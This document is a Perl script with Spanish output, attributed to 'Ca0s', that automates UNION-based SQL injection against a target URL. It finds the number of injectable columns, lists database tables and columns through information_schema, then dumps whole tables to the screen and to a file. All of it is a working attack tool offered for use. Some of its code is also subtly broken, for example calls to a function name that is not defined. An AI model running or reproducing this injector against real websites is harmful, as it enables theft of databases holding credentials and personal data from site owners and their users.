#¡/usr/bin/perl

use Switch;
use LWP::Simple;

$sch="char(99,97,48,115,95,118)";

@instrucciones[0]="[/\\/\\/] | Perl SQL Inyector V.1 <----> By Ca0s {Alias sh0k!} | [\\/\\/\\]\n";
@instrucciones[1]="-----------------------------------------------------------------------\n";
@instrucciones[2]="<|-> Uso: perl ".$0."[OBJETIVO] [-s]                            <-|>\n\n";
@instrucciones[3]="<|>->->->->->->->Ca0s {Stack Error Team}// c40s[at]hotmail[dot]es <-|>\n\n";
$target=$ARGV[0] || die("\n"."@instrucciones");
if($target!~/^http:\/\//) 
{
	$target="http://".$target;
}
print "\n".@instrucciones[0].$instrucciones[1];
print "\n[+] Objetivo: ".$target."\n";
if($ARGV[1] eq "-s")
{
	$skip=1;
}
if($skip==1)
{
	print "[-] Saltando comprobaciones...\n";
	$code=get($ARGV[0]);
}
else
{
	if(!($code=get($ARGV[0]))) 
	{
		error(1);
		exit(0);
	}
}
$code1=scalar(split("\n", get($target." AND 1=2")));

if(!$skip)
{
	if($code1==$code)
	{
		error(2);
		exit(0);
	}
}

$done1=0;
$iny=" GROUP BY ";
$n=1;
$l1=scalar(split("\n", $code));
while($done1==0)
{
	$inyx=$iny.$n;
	$atk=$ARGV[0].$inyx;
	$web=get($atk);
	$l2=scalar(split("\n", $web));
	if($l1!=$l2)
	{
		$pars=$n-1;
		print "[+] Nº de parámetros: ".$pars."\n";
		$inyeccion=$ARGV[0]." AND 1=2 UNION SELECT concat(".$sch.",1,".$sch.")";
		$inyeccion2=$ARGV[0]." AND 1=2 UNION SELECT 1";
		for($c=2; $c<=$pars; $c++)
		{
				$inyeccion=$inyeccion.",concat(".$sch.",".$c.",".$sch.")";
				$inyeccion2=$inyeccion2.",".$c;
		}
		print "[+] Inyecciones:\n  -- ".$atk."\n  -- ".$inyeccion2."\n";
		$done1=1;
	}

	$n=$n+1;
}
#	$pars -> número de valores

print "[+] Valores que imprimen: ";
@vars;
$web=get($inyeccion);
$t;
for($t=1; $t<=$pars; $t++)
{
	$val="ca0s_v".$t."ca0s_v";
	if(parsetext($inyeccion)=~/$val/) 
	{
		push(@vars, "$t");
	}
}
if (@vars==0)
{
	error(3);
	exit(0);
}
else
{
	print "@vars"."\n";
}

print "[+] Probando information_schema...";
$print= "@vars[0]";
$inyis=" AND 1=2 UNION SELECT 1";
$ca0s_is="char(99,97,48,115,95,105,115,95)";
$ca0s_is2="char(99,97,48,115,95,105,115,50,95)";
for($c=2; $c<=$pars; $c++)
{
	if($c==$print)
	{
		$inyis=$inyis.",concat(".$ca0s_is.", count(*), ".$ca0s_is2.") ";
	}
	else
	{
		$inyis=$inyis.",".$c;
	}
}
$inyis.=" FROM information_schema.tables";
$target=$ARGV[0];

$inyisparsed=parsetext($ARGV[0].$inyis);
if(index($inyisparsed, "ca0s_is_")!=-1)
{
	print " Information_Schema disponible, extrayendo nombre de tablas.\n";
}
else
{
	error(4);
	exit(0);
}
$p1=index($inyisparsed, "ca0s_is_");
$p2=index($inyisparsed, "ca0s_is2_");
$ntables=substr($inyisparsed, $p1+8, $p2-$p1-8)-1;	# 8 es la longitud de ca0s_is_
print "  -- Número de tablas: ".$ntables."\n";

@tname;
for($t=1; $t<=$ntables; $t++)
{
	$inyt=" AND 1=2 UNION SELECT 1";
	for($m=2; $m<=$pars; $m++)
	{
		if($m==$print)
		{
			$inyt.=",concat(".$ca0s_is.", table_name, ".$ca0s_is2.") ";
		}
		else
		{
			$inyt.=",".$m;
		}
		
	}
	$inyt.=" FROM information_schema.tables LIMIT ".$t.",1";
	$codet=parsetext($ARGV[0].$inyt);
	$p1=index($codet, "ca0s_is_");
	$p2=index($codet, "ca0s_is2_");
	$tname=substr($codet, $p1+8, $p2-$p1-8);
	push(@tname, "$tname");
}	
print "  -- Tablas extraídas:";
for($x=0; $x<=$ntables-1; $x++)
{
	print "\n".$x."\t".@tname[$x];
}

print "\n[+] Introduce el nº de tabla para extraer sus datos (CTRL+Z para salir)>> ";
$tnum=<STDIN>;
$tname="@tname[$tnum]";
print "\n  -- Tabla-> ".$tname;

@columnas;
$inyc=" AND 1=2 UNION SELECT 1";
for($c=2; $c<=$pars; $c++)
{
	if($c==$print)
	{
		$inyc.=",concat(".$ca0s_is.", count(*), ".$ca0s_is2.") ";
	}
	else
	{
		$inyc.=",".$c;
	}	
}
$tnord=ordstring($tname);
$inyc.=" from information_schema.columns where table_name=char(".$tnord.")";
$codec=parsetext($ARGV[0].$inyc);
$p1=index($codec, "ca0s_is_");
$p2=index($codec, "ca0s_is2_");
$cnum=substr($codec, $p1+8, $p2-$p1-8);
print "\n  -- Número de columnas-> ".$cnum."\n";
for($cn=0; $cn<=$cnum; $cn++)
{
	$inycols=" AND 1=2 UNION SELECT 1";
	for($c=2; $c<=$pars; $c++)
	{
		if($c==$print)
		{
			$inycols.=",concat(".$ca0s_is.", column_name, ".$ca0s_is2.") ";
		}
		else
		{
			$inycols.=",".$c;
		}	
	}
	$inycols.=" from information_schema.columns where table_name=char(".$tnord.")";
	$inycols.=" limit ".$cn.",1";
	$colscode=parsetext($ARGV[0].$inycols);
	$p1=index($colscode, "ca0s_is_");
	$p2=index($colscode, "ca0s_is2_");
	$colname=substr($colscode, $p1+8, $p2-$p1-8);
	push(@columnas, $colname);
}

print "  -- Columnas:\n";
for($b=0; $b<$cnum; $b++)
{
	print "    -- ".@columnas[$b]."\n";
}

$inynrows=" AND 1=2 UNION SELECT 1";
for($nr=2; $nr<=$pars; $nr++)
{
	if($nr==$print)
	{
		$inynrows.=",concat(".$ca0s_is.", count(char(".ordstring(@columnas[0]).")), ".$ca0s_is2.") ";
	}
	else
	{
		$inynrows.=",".$nr;
	}	
}
$inynrows.=" from ".$tname;
$codenr=parsetext($ARGV[0].$inynrows);
$p1=index($codenr, "ca0s_is_");
$p2=index($codenr, "ca0s_is2_");
$nrows=substr($codenr, $p1+8, $p2-$p1-8);
print "  -- Rows: ".$nrows;
print "\n\n[/] Extraer datos de la tabla? (ENTER para continuar, CTRL+Z para no hacerlo) --> ";
$rest=<STDIN>;
@data;
print "\n[+] Extrayendo datos de la tabla ".$tname."...\n";
print "\n[*] Formato: [columna](fila) -> dato\n";
for($dr=0; $dr<=$nrows-1; $dr++)
{
	
	for($dc=0; $dc<=$cnum-1; $dc++)
	{
		$inydata=" AND 1=2 UNION SELECT 1";
		for($di=2; $di<=$pars; $di++)
		{
			if($di==$print)
			{
				$inydata.=",concat(".$ca0s_is.",@columnas[$dc] , ".$ca0s_is2.") ";
			}
			else
			{
				$inydata.=",".$di;
			}
		}
		$inydata.=" FROM ".$tname." limit ".$dr.",1";	
		$codedata=parsetext($ARGV[0].$inydata);
		$p1=index($codedata, "ca0s_is_");
		$p2=index($codedata, "ca0s_is2_");
		$data=substr($codedata, $p1+8, $p2-$p1-8);
		
		print "\n[".@columnas[$dc]."](".$dr.") -> ".$data;
		$texto.=$data."\t\t";
	}
	print "\n\n-------------------------------\n\n";
	$texto.="\n";
}
print "\n[/] Guardar tabla en archivo de texto? (s/n) ";
$rest= <STDIN>;
chomp($rest);

if($rest eq "s")
{
	print "\n  -- Nombre de archivo: ";
	$tpath= <STDIN>;
	chop($stdin);
	$header="";
	for($h=0; $h<=@columnas; $h++)
	{
		$header.=@columnas[$h]."\t\t";
	}
	$header.="\n\n";
	open(FILEtxt,">$tpath");
	print FILEtxt "$header";
	close(FILEtxt);
	open(FILEtxt, ">>$tpath");
	print FILEtxt "$texto";
	close(FILEtxt);
	print "\n[+] Guardado en $tpath";
}

print "\n[+] Finalizado.";
print "\n@instrucciones[3]";

#------Funciones-----------------------------------------------------

sub error
{
	$num=shift;
	switch($num)
	{
		case 1  { print "[-] Objetivo no válido\n\n"; }
		case 2  { print "[-] Objetivo no vulnerable\n\n"; }
		case 3  { print " Ningún valor imprime. Imposoble continuar, saliendo.\n\n"; }
		case 4  { print "\n----Information_schema no disponible. Imposible continuar, saliendo.\n\n"; }
	}
}

# Funcion para extraer el texto de una web ->> Debe ser MUY mejorada
sub parsetextoxd
{
	$target=shift;
	$content=get($target);

	$len = length($content);
	$html = "0";          # THE FLAG
	$htmlcode = "";       # THE HTML CODE
	$htmlcontent = "";    # THE CONTENT OF THE PAGE

	$i = 0;
	for ($i = 0; $i < $len; $i++)
	{
  
  		$char = substr($content, $i, 1);
		if($char eq "<")
		{
			$html="1";
		}
		if($html != "1")
		{
			$htmlcontent=$htmlcontent.$char;
		}
		if($char eq ">")
		{
			$html="0";
		} 
	}
return $htmlcontent;
}
	
sub ordstring
{
	$srting=shift;
	$tnlong=length($tname);
	$tnord="";
	$tnl;
	for($tnl=0; $tnl<=$tnlong-1; $tnl++)
	{
		$tchar="";
		$tchar=substr($tname, $tnl, 1);
		$tnord.=ord($tchar).",";
	}
	chop($tnord);
	return $tnord;
	$string="";
	$tnord="";
	$tnl=0;
}